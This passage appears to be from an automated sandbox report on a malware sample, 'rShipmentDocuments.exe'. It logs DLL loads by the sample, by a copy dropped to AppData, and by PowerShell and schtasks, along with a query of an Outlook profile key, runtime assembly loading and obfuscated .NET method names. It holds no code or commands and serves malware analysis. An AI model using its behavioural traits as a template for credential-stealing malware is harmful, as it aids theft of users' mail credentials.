                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: rasapi32.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: rasman.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: rtutils.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: secur32.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: textshaping.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: iconcodecservice.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder  Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe  File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: rShipmentDocuments.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: rShipmentDocuments.exe  Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.cs  .Net Code: WdEubta7iG System.Reflection.Assembly.Load(byte[])
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.cs  .Net Code: WdEubta7iG System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe  Code function: 0_2_058D3243 pushad ; iretd  0_2_058D3249
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe  Code function: 0_2_058D3F8B pushad ; retn 0582h  0_2_058D3F65
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe  Code function: 9_2_068F9233 push es; ret  9_2_068F9244
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Code function: 10_2_04CE3248 pushad ; iretd  10_2_04CE3249
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Code function: 10_2_069C04E7 push ebp; ret  10_2_069C04E8
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Code function: 16_2_0303EFDF push ds; retn 0005h  16_2_0303EFEA
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Code function: 16_2_06D89241 push es; ret  16_2_06D89244
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe  Code function: 16_2_06D838AD push eax; retn 0005h  16_2_06D838B2
                Source: rShipmentDocuments.exe  Static PE information: section name: .text entropy: 7.843601109745972
                Source: ZOlmYtPdlO.exe.0.dr  Static PE information: section name: .text entropy: 7.843601109745972
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, sfMpDDrgl5tIjHCJHi.cs  High entropy of concatenated method names: 'vpGaW2PTN0', 'wegaH4jDyg', 'urWa4qvVbq', 'fCX4PYIhOH', 'q1B4zNkRqf', 'rLVaZC16tS', 'w83a3OIIqq', 'okgaIn8Z3B', 'fkEagww8gU', 'khqaunenWt'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, LGGmv9ymOKi5LCYbxd.cs  High entropy of concatenated method names: 'npHX1AblaZ', 'baqXEkOt7J', 'RuKX7KX4eq', 'iSVX6FFjK2', 'zlbXo0AyVg', 'xk8Xxe5gYw', 'Sv5X2f9F7e', 'PCAXcTpR9F', 'M3RXAoD4rj', 'dLsXJ9p8BR'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, zXKTFwNZqwSqRHqKqL.cs  High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BxBIS2KtjI', 'OZvIPm7kRm', 'aJfIzkbxK0', 'FO2gZ65hKM', 'oFRg3K4U1G', 'yfFgInamSb', 'gR9ggG0bIJ', 'awC6mZHPi1ydDq46Q07'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.cs  High entropy of concatenated method names: 'Gn3gmISRMx', 'q1DgWRbbnS', 'g3Zg0nnG3v', 'JmvgH6JwhY', 'RYrgQKVfGT', 'RyEg4wbiXp', 'barga0LMAT', 'ShtgFVfD6W', 'Gghg8Ndg2K', 'TuvgCnWjLB'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, rrJmBaYMgAesC46HKX.cs  High entropy of concatenated method names: 'xG3QjGn87h', 'NN6QYWiYKT', 'OKIHxSvTmK', 'AqtH2WSMQw', 'LWaHcxDdlY', 'blWHATvVd3', 'GtQHJ0E0eI', 'FTOH5SR86k', 'rdiHLAdUMj', 'x6DH1Vb3Zt'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, K5wdDCoyqRME3lH5EU.cs  High entropy of concatenated method names: 'jTmbXwA9h', 'Vd0sdqFFt', 'UG5q0NHX8', 'uB1YhlsGh', 'FOlpvT7i5', 'yIfhkRr26', 'Y7fIVyZ8DGQoBgOfCL', 'WYQoZojU6ruWO8Bbng', 'KsNBLPTyw', 'rSaOPD72o'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, WHIuwreRDsPbwviSjC.cs  High entropy of concatenated method names: 'fQg07Wj5vS', 'DJC060ZXno', 'ja20RebG4F', 'l5m09JnrAG', 'CNd0wT3LMj', 'PrE0eIt332', 'stK0MFBRSS', 'hI80DxEbfd', 'IWg0SxrwDy', 'pf00PfKDeV'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, tUWY54atKrJQlDpHvp.cs  High entropy of concatenated method names: 'Dispose', 'KQk3SQMWoP', 'c89IogNuuD', 'rhwllieQpv', 'IkQ3PMBGby', 'pam3zPCspE', 'ProcessDialogKey', 'vjvIZx49D7', 'ctGI37nYx2', 'jNfIIOfYcv'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, XVYEWIFWBiLsTMqJ21.cs  High entropy of concatenated method names: 'nJ7akCNgu4', 'tDnaVDpnE1', 'tuAabZBu5u', 'G7lasRfKEf', 'wZBajVwA4O', 'wgFaqeYGSB', 'gTZaYWxLmp', 'u4taGsm15h', 'PvQapKO6Np', 'L3Uahmvh7C'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, Bw42dh4UebWEaNMXNVH.cs  High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VQ8O7dhF48', 'Ib4O6t3FLx', 'imVOR3G4oi', 'tYDO9I8vkI', 'yI3OwPIGJi', 'Re5OendZeS', 'QmNOMxsioE'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, s8ssFsqinUuXVMjTPg.cs  High entropy of concatenated method names: 'lHW3agsf51', 'xxN3F2wPIp', 'XLl3CNyHhj', 'x6y3ytZCnf', 'Oa33XwFddK', 'vgZ3KOev9h', 'QU1cv2vHdMOPcQI0FR', 'RHw0quuw1230eOtEX9', 'G4N33Sb3gu', 'ARC3g7ykgO'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, syuYZq4btbLXi0a2KwI.cs  High entropy of concatenated method names: 'MBvrkZSfdd', 'nlYrVqSUI6', 'Exorb01ktZ', 'kEZrs65423', 'BVerjuu3Vh', 'gWPrqxGr2m', 'Lq4rYPUoN5', 'Y79rGTXibx', 'CNGrp5XXbI', 'isHrh3wD38'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, qsHtpHimvnffligSo0.cs  High entropy of concatenated method names: 'drqfDnTwja', 'FrqfPtuOjs', 'nq5BZadZge', 'EkJB33WMYx', 'LZ9ft19Krn', 'AtJfEJ0BDx', 'P0jfUibrEY', 'nbQf7fOIZa', 'e9xf64RC3h', 'HHvfRuFnMw'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, ajBCZlS1bBb6GaZcdb.cs  High entropy of concatenated method names: 'WaF4maqxIq', 'diS40DLdTd', 'nQU4QsfplF', 'DRm4abQiOR', 'J1a4FEu4HB', 'B45QwAOg80', 'qlbQeb1rY2', 'ou7QMDbksH', 'aZMQD2RIAd', 'vPlQS7PTAP'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, nSJmboJMlQX1MjvRbF.cs  High entropy of concatenated method names: 'PR5TGyjIux', 'RjeTp0rKrp', 'TnTTdw65DD', 'OvIToawqCA', 'uY9T2sKkJi', 'XQVTcFavt3', 'wJyTJxOMul', 'Wf3T59jFta', 'PwWT1jVNbN', 'HLOTtJCjBI'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, n1RHYrzOvkNoCypqxv.cs  High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QNDrT23w9l', 'eUvrXhj59N', 'AAxrKi78yI', 'ng3rfXJDDt', 'lplrBHsi0h', 'du2rruGQ1c', 'ARXrO0ByiC'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, ej24U02jMkJFDYhhLB.cs  High entropy of concatenated method names: 'jCpBWVVIgh', 'ei5B0owIh8', 'X24BHCxlVR', 'x7gBQjMYXC', 'EbkB4Oks9w', 'klDBaEsOYg', 'IpRBFdeDva', 'WIcB8GfT3c', 'W0LBCSI4CH', 'MAMByKUJpy'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, yMxGlJ7yHLI4VmhwgP.cs  High entropy of concatenated method names: 'JJkfC9M6r0', 'To1fyO6V6X', 'ToString', 'EH0fWeJ5GH', 'iVmf0NNGpu', 'C21fH5tDeM', 'rtPfQ6lLd4', 'UECf4TNT17', 'vUEfa4ewC9', 'DZRfFb1K4L'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, EsoFSY1MObHNFvQ0yc.cs  High entropy of concatenated method names: 'weNr3ELckE', 'bYwrgh3JNF', 'NT4ruV2OPY', 'E9xrW2m6KQ', 'lcsr0wfgyD', 'UGYrQtCDfg', 'E5fr4SRavu', 'VbhBMmgLqE', 'OUDBDm9bgI', 'ryGBSA4fpR'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, hdAVyr44GYdXRtyTuLG.cs  High entropy of concatenated method names: 'ToString', 'ubJOgovSk8', 'i9POuw6ECr', 'l1sOmfJpMN', 't8vOWsB0vp', 'iMMO0VFYrC', 'PDuOHPRuPt', 'yjJOQlPG3O', 'Ddo0HSeILfk12ZA7FEA', 'hR65JTe0aurssDo5vXt'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, z0u6FmON9MQ6CyDB1o.cs  High entropy of concatenated method names: 'uh2Bd4uvT6', 'HlrBoZ6qD3', 'jm8BxKcDwq', 'bNLB2cZIGx', 'jRJB7ZJMOe', 'NRtBc0N1l1', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, v2559Cskf3ytVZ5mSG.cs  High entropy of concatenated method names: 'rtYHsdjGE7', 'P2WHq0gNe1', 'B6FHGZcgn0', 'dcZHpveFUp', 'WO1HXtj9rM', 'DljHKqvF8J', 'jeZHfPVBXW', 'sTrHByZ4Jn', 'lLlHrHqZjH', 'gF2HOFObap'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, WuxZfQxTK70JGtybAX.cs  High entropy of concatenated method names: 'ToString', 'CKxKt5bHCD', 'RobKonCHh0', 'ccRKxakiYl', 'BMCK2ps888', 'Q7ZKcj2ooO', 'jaCKAB1c6w', 'RynKJnIe0A', 'hneK5oH9J4', 'ti4KLWKYBM'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, sfMpDDrgl5tIjHCJHi.cs  High entropy of concatenated method names: 'vpGaW2PTN0', 'wegaH4jDyg', 'urWa4qvVbq', 'fCX4PYIhOH', 'q1B4zNkRqf', 'rLVaZC16tS', 'w83a3OIIqq', 'okgaIn8Z3B', 'fkEagww8gU', 'khqaunenWt'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, LGGmv9ymOKi5LCYbxd.cs  High entropy of concatenated method names: 'npHX1AblaZ', 'baqXEkOt7J', 'RuKX7KX4eq', 'iSVX6FFjK2', 'zlbXo0AyVg', 'xk8Xxe5gYw', 'Sv5X2f9F7e', 'PCAXcTpR9F', 'M3RXAoD4rj', 'dLsXJ9p8BR'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, zXKTFwNZqwSqRHqKqL.cs  High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BxBIS2KtjI', 'OZvIPm7kRm', 'aJfIzkbxK0', 'FO2gZ65hKM', 'oFRg3K4U1G', 'yfFgInamSb', 'gR9ggG0bIJ', 'awC6mZHPi1ydDq46Q07'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.cs  High entropy of concatenated method names: 'Gn3gmISRMx', 'q1DgWRbbnS', 'g3Zg0nnG3v', 'JmvgH6JwhY', 'RYrgQKVfGT', 'RyEg4wbiXp', 'barga0LMAT', 'ShtgFVfD6W', 'Gghg8Ndg2K', 'TuvgCnWjLB'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, rrJmBaYMgAesC46HKX.cs  High entropy of concatenated method names: 'xG3QjGn87h', 'NN6QYWiYKT', 'OKIHxSvTmK', 'AqtH2WSMQw', 'LWaHcxDdlY', 'blWHATvVd3', 'GtQHJ0E0eI', 'FTOH5SR86k', 'rdiHLAdUMj', 'x6DH1Vb3Zt'
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, K5wdDCoyqRME3lH5EU.cs  High entropy of concatenated method names: 'jTmbXwA9h', 'Vd0sdqFFt', 'UG5q0NHX8', 'uB1YhlsGh', 'FOlpvT7i5', 'yIfhkRr26', 'Y7fIVyZ8DGQoBgOfCL', 'WYQoZojU6ruWO8Bbng', 'KsNBLPTyw', 'rSaOPD72o'
